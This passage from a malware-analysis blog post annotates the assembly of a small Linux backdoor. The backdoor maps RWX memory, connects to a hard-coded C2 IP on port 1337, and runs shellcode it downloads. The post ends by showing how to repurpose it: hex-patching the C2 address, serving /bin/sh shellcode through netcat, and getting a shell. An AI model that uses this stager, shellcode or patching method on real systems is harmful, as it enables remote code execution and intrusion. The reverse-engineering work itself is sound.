<span class="err">0</span><span class="nf">x004000e4</span>      <span class="nv">jns</span> <span class="mh">0x4000ad</span>       <span class="c1">; jump back if connect failed or nanosleep encounters an error</span>
<span class="err">0</span><span class="nf">x004000e6</span>      <span class="nv">push</span> <span class="mh">0x3c</span>          <span class="c1">; gets here if socket unsuccessful or tried connecting 10 times or read failed or mmap failed</span>
<span class="err">0</span><span class="nf">x004000e8</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000e9</span>      <span class="nv">push</span> <span class="mi">1</span>             
<span class="err">0</span><span class="nf">x004000eb</span>      <span class="nv">pop</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000ec</span>      <span class="nv">syscall</span>            <span class="c1">; exit syscall</span>
<span class="err">0</span><span class="nf">x004000ee</span>      <span class="nv">pop</span> <span class="nb">rsi</span>            <span class="c1">; gets here if connect successful, so RAX=0, rsi=mmapped address popped from the stack</span>
<span class="err">0</span><span class="nf">x004000ef</span>      <span class="nv">pop</span> <span class="nb">rdx</span>            <span class="c1">; 4096 bytes to be read from connect file descriptor</span>
<span class="err">0</span><span class="nf">x004000f0</span>      <span class="nv">syscall</span>            <span class="c1">; read syscall; rdi=connect file descriptor</span>
<span class="err">0</span><span class="nf">x004000f2</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000f5</span>      <span class="nv">js</span> <span class="mh">0x4000e6</span>
<span class="err">0</span><span class="nf">x004000f7</span>      <span class="nv">jmp</span> <span class="nb">rsi</span>            <span class="c1">; execute the bytes read from the connect syscall (shellcode) in the memory mapped address space</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>Let’s start from the beginning by dividing the assembly in chunks with each syscall at the borders keeping in mind that the backdoor is connecting to a C2 and executing shellcode, so somewhere during the journey we should expect networking and memory related syscalls.</p>

<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td><td class="code"><pre><span class="err">0</span><span class="nf">x00400078</span>      <span class="nv">xor</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x0040007b</span>      <span class="nv">push</span> <span class="mi">9</span>             
<span class="err">0</span><span class="nf">x0040007d</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x0040007e</span>      <span class="nv">cdq</span>
<span class="err">0</span><span class="nf">x0040007f</span>      <span class="nv">mov</span> <span class="nb">dh</span><span class="p">,</span> <span class="mh">0x10</span>       <span class="c1">; 16</span>
<span class="err">0</span><span class="nf">x00400081</span>      <span class="nv">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rdx</span>       <span class="c1">; arg3 ; 4096</span>
<span class="err">0</span><span class="nf">x00400084</span>      <span class="nv">xor</span> <span class="nv">r9</span><span class="p">,</span> <span class="nv">r9</span>
<span class="err">0</span><span class="nf">x00400087</span>      <span class="nv">push</span> <span class="mh">0x22</span>          <span class="c1">; 34</span>
<span class="err">0</span><span class="nf">x00400089</span>      <span class="nv">pop</span> <span class="nv">r10</span>
<span class="err">0</span><span class="nf">x0040008b</span>      <span class="nv">mov</span> <span class="nb">dl</span><span class="p">,</span> <span class="mi">7</span>
<span class="err">0</span><span class="nf">x0040008d</span>      <span class="nv">syscall</span>            <span class="c1">; mmap syscall</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>syscall number 9 is mapped to the mmap function. This is the mmap function declaration:
<code class="language-plaintext highlighter-rouge">void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);</code>
We should keep it in mind while poking around registers and understand how mmap is called. From the assembly we can understand the following:</p>
<ul>
  <li>*addr–&gt; RDI=0</li>
  <li>length –&gt; RSI=0x1000  — 4096 minimum allocatable page size in 32-64 bit Linux</li>
  <li>prot –&gt; RDX= 0x1007  — PROT_READ - PROT_WRITE - PROT_EXEC - 0x1000</li>
  <li>flags –&gt; R10= 0x22  — MAP_PRIVATE - MAP_ANONYMOUS</li>
  <li>fd –&gt; r8=0</li>
  <li>offset –&gt; r9=0</li>
</ul>

<p>To better understand its arguments let’s summon the mmap man page:</p>
<blockquote>
  <p>mmap() creates a new mapping in the virtual address space of the calling process.  The starting address for the new mapping is specified in addr.  The length argument specifies the length of the mapping (which must be greater than 0). If addr is NULL, then the kernel chooses the (page-aligned) address at which to create the mapping; this is the most portable method of creating a new mapping.  If addr is not NULL, then the kernel takes it as a hint about where to place the mapping; on Linux, the kernel will pick a nearby page boundary (but always above or equal to the value specified by /proc sys/vm/mmap_min_addr) and attempt to create the mapping there.  If another mapping already exists there, the kernel picks a new address that may or may not depend on the hint. The address of the new mapping is returned as the result of the call. The prot argument describes the desired memory protection of the mapping (and must not conflict with the open mode of the file).</p>
</blockquote>

<p>For what we know we can see that here mmap is used by this tiny malware to allocate a larger memory region inside the target process’ address
space, and page has been set as readable, writable and/or executable.</p>

<p>Here is the next assembly chunk to be analyzed:</p>

<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="code"><pre><span class="err">0</span><span class="nf">x00400094</span>      <span class="nv">push</span> <span class="mh">0xa</span>           <span class="c1">; 10</span>
<span class="err">0</span><span class="nf">x00400096</span>      <span class="nv">pop</span> <span class="nv">r9</span>
<span class="err">0</span><span class="nf">x00400098</span>      <span class="nv">push</span> <span class="nb">rsi</span>           <span class="c1">; saves 4096 on the stack later use in read syscall</span>
<span class="err">0</span><span class="nf">x00400099</span>      <span class="nv">push</span> <span class="nb">rax</span>           <span class="c1">; saves mmapped address on the stack later use in read syscall and shellcode execution</span>
<span class="err">0</span><span class="nf">x0040009a</span>      <span class="nv">push</span> <span class="mh">0x29</span>          <span class="c1">; 41</span>
<span class="err">0</span><span class="nf">x0040009c</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x0040009d</span>      <span class="nv">cdq</span>
<span class="err">0</span><span class="nf">x0040009e</span>      <span class="nv">push</span> <span class="mi">2</span>             
<span class="err">0</span><span class="nf">x004000a0</span>      <span class="nv">pop</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000a1</span>      <span class="nv">push</span> <span class="mi">1</span>             
<span class="err">0</span><span class="nf">x004000a3</span>      <span class="nv">pop</span> <span class="nb">rsi</span>
<span class="err">0</span><span class="nf">x004000a4</span>      <span class="nv">syscall</span>            <span class="c1">; socket syscall</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>Syscall number 41 is related to the socket function and its declaration is <code class="language-plaintext highlighter-rouge">int socket(int domain, int type, int protocol);</code>
As per the man page:</p>
<blockquote>
  <p>socket()  creates  an  endpoint  for  communication  and returns a file descriptor that refers to that endpoint.  The file descriptor  returned by  a  successful  call will be the lowest-numbered file descriptor not currently open for the process.
This code snippets creates an endpoint for a communication of type SOCK_STREAM, on the PF_INET domain and with IP protocol.</p>
</blockquote>

<p>This one is pretty self-explanatory,now let’s dig onto the next chunk:</p>

<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td><td class="code"><pre><span class="err">0</span><span class="nf">x004000a6</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000a9</span>      <span class="nv">js</span> <span class="mh">0x4000e6</span>        <span class="c1">; jump forward to exit block if socket unsuccessful</span>
<span class="err">0</span><span class="nf">x004000ab</span>      <span class="nv">xchg</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000ad</span>      <span class="nv">movabs</span> <span class="nb">rcx</span><span class="p">,</span> <span class="mh">0xc2edf86839050002</span> <span class="c1">; gets here if socket successful or connect unsuccessful and after nanosleep</span>
<span class="err">0</span><span class="nf">x004000b7</span>      <span class="nv">push</span> <span class="nb">rcx</span>           <span class="c1">; holds the connect addr structure</span>
<span class="err">0</span><span class="nf">x004000b8</span>      <span class="nv">mov</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsp</span>       <span class="c1">; pointer to the addr structure</span>
<span class="err">0</span><span class="nf">x004000bb</span>      <span class="nv">push</span> <span class="mh">0x10</span>          <span class="c1">; 16</span>
<span class="err">0</span><span class="nf">x004000bd</span>      <span class="nv">pop</span> <span class="nb">rdx</span>
<span class="err">0</span><span class="nf">x004000be</span>      <span class="nv">push</span> <span class="mh">0x2a</span>          <span class="c1">; 42</span>
<span class="err">0</span><span class="nf">x004000c0</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000c1</span>      <span class="nv">syscall</span>            <span class="c1">; connect syscall</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>The code sets up a syscall 42, calling the connect function that is declared this way <code class="language-plaintext highlighter-rouge">int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);</code> within the RCX register is put the struct sockaddr that can be broken down in this way:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">02 00 AF_INET</code></li>
  <li><code class="language-plaintext highlighter-rouge">05 39 port 1337</code></li>
  <li><code class="language-plaintext highlighter-rouge">68 f8 ed c2 IP 104.248.237.194</code></li>
</ul>

<p>These are the IP address and port of the malware C2 to whom the backdoor is connecting.</p>

<p>Here is the next assembly snippet:</p>

<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="code"><pre><span class="err">0</span><span class="nf">x004000c3</span>      <span class="nv">pop</span> <span class="nb">rcx</span>
<span class="err">0</span><span class="nf">x004000c4</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000c7</span>      <span class="nv">jns</span> <span class="mh">0x4000ee</span>       <span class="c1">; jump to read and execute shellcode if connect successful</span>
<span class="err">0</span><span class="nf">x004000c9</span>      <span class="nv">dec</span> <span class="nv">r9</span>
<span class="err">0</span><span class="nf">x004000cc</span>      <span class="nv">je</span> <span class="mh">0x4000e6</span>        <span class="c1">; decrement 10 1 by 1 and compares it with -1 (connect returned error)</span>
<span class="err">0</span><span class="nf">x004000ce</span>      <span class="nv">push</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000cf</span>      <span class="nv">push</span> <span class="mh">0x23</span>          <span class="c1">; 35</span>
<span class="err">0</span><span class="nf">x004000d1</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000d2</span>      <span class="nv">push</span> <span class="mi">0</span>
<span class="err">0</span><span class="nf">x004000d4</span>      <span class="nv">push</span> <span class="mi">5</span>             
<span class="err">0</span><span class="nf">x004000d6</span>      <span class="nv">mov</span> <span class="nb">rdi</span><span class="p">,</span> <span class="nb">rsp</span>
<span class="err">0</span><span class="nf">x004000d9</span>      <span class="nv">xor</span> <span class="nb">rsi</span><span class="p">,</span> <span class="nb">rsi</span>
<span class="err">0</span><span class="nf">x004000dc</span>      <span class="nv">syscall</span>            <span class="c1">; nanosleep syscall</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>Syscall with argument 35 invokes the nanosleep function <code class="language-plaintext highlighter-rouge">int nanosleep(const struct timespec *req, struct timespec *rem);</code> that does the following</p>

<blockquote>
  <p>nanosleep() suspends the execution of the calling thread until either
at least the time specified in *req has elapsed, or the delivery of a
signal that triggers the invocation of a handler in the calling
thread or that terminates the process. […] On successfully sleeping for the requested interval, nanosleep()
returns 0.  If the call is interrupted by a signal handler or
encounters an error, then it returns -1, with errno set to indicate
the error.</p>
</blockquote>

<p>We are approaching the end of the backdoor and the magic is going to kick in. Here is the final assembly snippet:</p>

<figure class="highlight"><pre><code class="language-nasm" data-lang="nasm"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre></td><td class="code"><pre><span class="err">0</span><span class="nf">x004000de</span>      <span class="nv">pop</span> <span class="nb">rcx</span>
<span class="err">0</span><span class="nf">x004000df</span>      <span class="nv">pop</span> <span class="nb">rcx</span>
<span class="err">0</span><span class="nf">x004000e0</span>      <span class="nv">pop</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000e1</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000e4</span>      <span class="nv">jns</span> <span class="mh">0x4000ad</span>       <span class="c1">; jump back if connect failed or nanosleep encounters an error</span>
<span class="err">0</span><span class="nf">x004000e6</span>      <span class="nv">push</span> <span class="mh">0x3c</span>          <span class="c1">; gets here if socket unsuccessful or tried connecting 10 times or read failed or mmap failed</span>
<span class="err">0</span><span class="nf">x004000e8</span>      <span class="nv">pop</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000e9</span>      <span class="nv">push</span> <span class="mi">1</span>             
<span class="err">0</span><span class="nf">x004000eb</span>      <span class="nv">pop</span> <span class="nb">rdi</span>
<span class="err">0</span><span class="nf">x004000ec</span>      <span class="nv">syscall</span>            <span class="c1">; exit syscall</span>
<span class="err">0</span><span class="nf">x004000ee</span>      <span class="nv">pop</span> <span class="nb">rsi</span>            <span class="c1">; gets here if connect successful, so RAX=0, rsi=mmapped address popped from the stack</span>
<span class="err">0</span><span class="nf">x004000ef</span>      <span class="nv">pop</span> <span class="nb">rdx</span>            <span class="c1">; 4096 bytes to be read from connect file descriptor</span>
<span class="err">0</span><span class="nf">x004000f0</span>      <span class="nv">syscall</span>            <span class="c1">; read syscall; rdi=connect file descriptor</span>
<span class="err">0</span><span class="nf">x004000f2</span>      <span class="nv">test</span> <span class="nb">rax</span><span class="p">,</span> <span class="nb">rax</span>
<span class="err">0</span><span class="nf">x004000f5</span>      <span class="nv">js</span> <span class="mh">0x4000e6</span>
<span class="err">0</span><span class="nf">x004000f7</span>      <span class="nv">jmp</span> <span class="nb">rsi</span>            <span class="c1">; execute the bytes read from the connect syscall (shellcode) in the memory mapped address space</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>This code block contains the exit syscall which is hit whenever other syscalls fail (mmap, connect, socket, read), and right after that, by using the memory mapped address saved on the stack as a buffer, the read syscall does exactly what it says: it reads bytes (max. 4096) from the file descriptor created with the connect syscall and place them in the buffer. Then if no error arises the execution is passed to the opcodes starting from the address saved in RSI register, that is the memory mapped address (marked as RWX) and the read buffer where we placed the shellcode received with the connect syscall. In other words this tiny 249 bytes backdoor can achieve in memory execution of an arbitrary remotely downloaded shellcode. There are no applied opsec features such as a decoding/decryption routine for the downloaded shellcode, custom ELF packer scheme etc. so the C2 software for the backdoor can be anything capable of transmitting predetermined shellcode via a network socket and anyone with a hex editor can change the sockaddr structure to modify the C2 IP and reuse the backdoor.
Let’s try that and modify the contents of the connect syscall addr structure at the address 0x004000ad:
Address 127.0.0.1 with port 1337 translates to <code class="language-plaintext highlighter-rouge">0x0100007f39050002</code>, it is enough to use whatever hex editor like bless and patch the backdoor.</p>

<p>We are using a [/bin/sh shellcode]{http://shell-storm.org/shellcode/files/shellcode-806.php} for a local test:</p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
</pre></td><td class="code"><pre>python <span class="nt">-c</span> “print ‘<span class="se">\x</span>31<span class="se">\x</span>c0<span class="se">\x</span>48<span class="se">\x</span>bb<span class="se">\x</span>d1<span class="se">\x</span>9d<span class="se">\x</span>96<span class="se">\x</span>91<span class="se">\x</span>d0<span class="se">\x</span>8c<span class="se">\x</span>97<span class="se">\x</span>ff<span class="se">\x</span>48<span class="se">\x</span>f7<span class="se">\x</span>db<span class="se">\x</span>53<span class="se">\x</span>54<span class="se">\x</span>5f<span class="se">\x</span>99<span class="se">\x</span>52<span class="se">\x</span>57<span class="se">\x</span>54<span class="se">\x</span>5e<span class="se">\x</span>b0<span class="se">\x</span>3b<span class="se">\x</span>0f<span class="se">\x</span>05’” | nc <span class="nt">-lvp</span> 1337
Listening on <span class="o">[</span>0.0.0.0] <span class="o">(</span>family 0, port 1337<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></figure>

<p>finally firing up the patched backdoor:</p>

<figure class="highlight"><pre><code class="language-bash" data-lang="bash"><table class="rouge-table"><tbody><tr><td class="gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="code"><pre>root@remnux:/home/remnux/Desktop/backdoor# ./pay_patched.bin
<span class="c"># echo $0</span>
/bin/sh
</pre></td></tr></tbody></table></code></pre></figure>

<p>That’s it. Repurposed backdoor.
Writing this post allowed me to better understand the logic flow of the backdoor that malware author(s) chose to use and linux in-memory shellcode execution.</p>]]></content><author><name>Naksyn</name></author><category term="Backdoor" /><category term="reverse-engineering" /><category term="backdoor" /><category term="assembler" /><summary type="html"><![CDATA[]]></summary></entry></feed>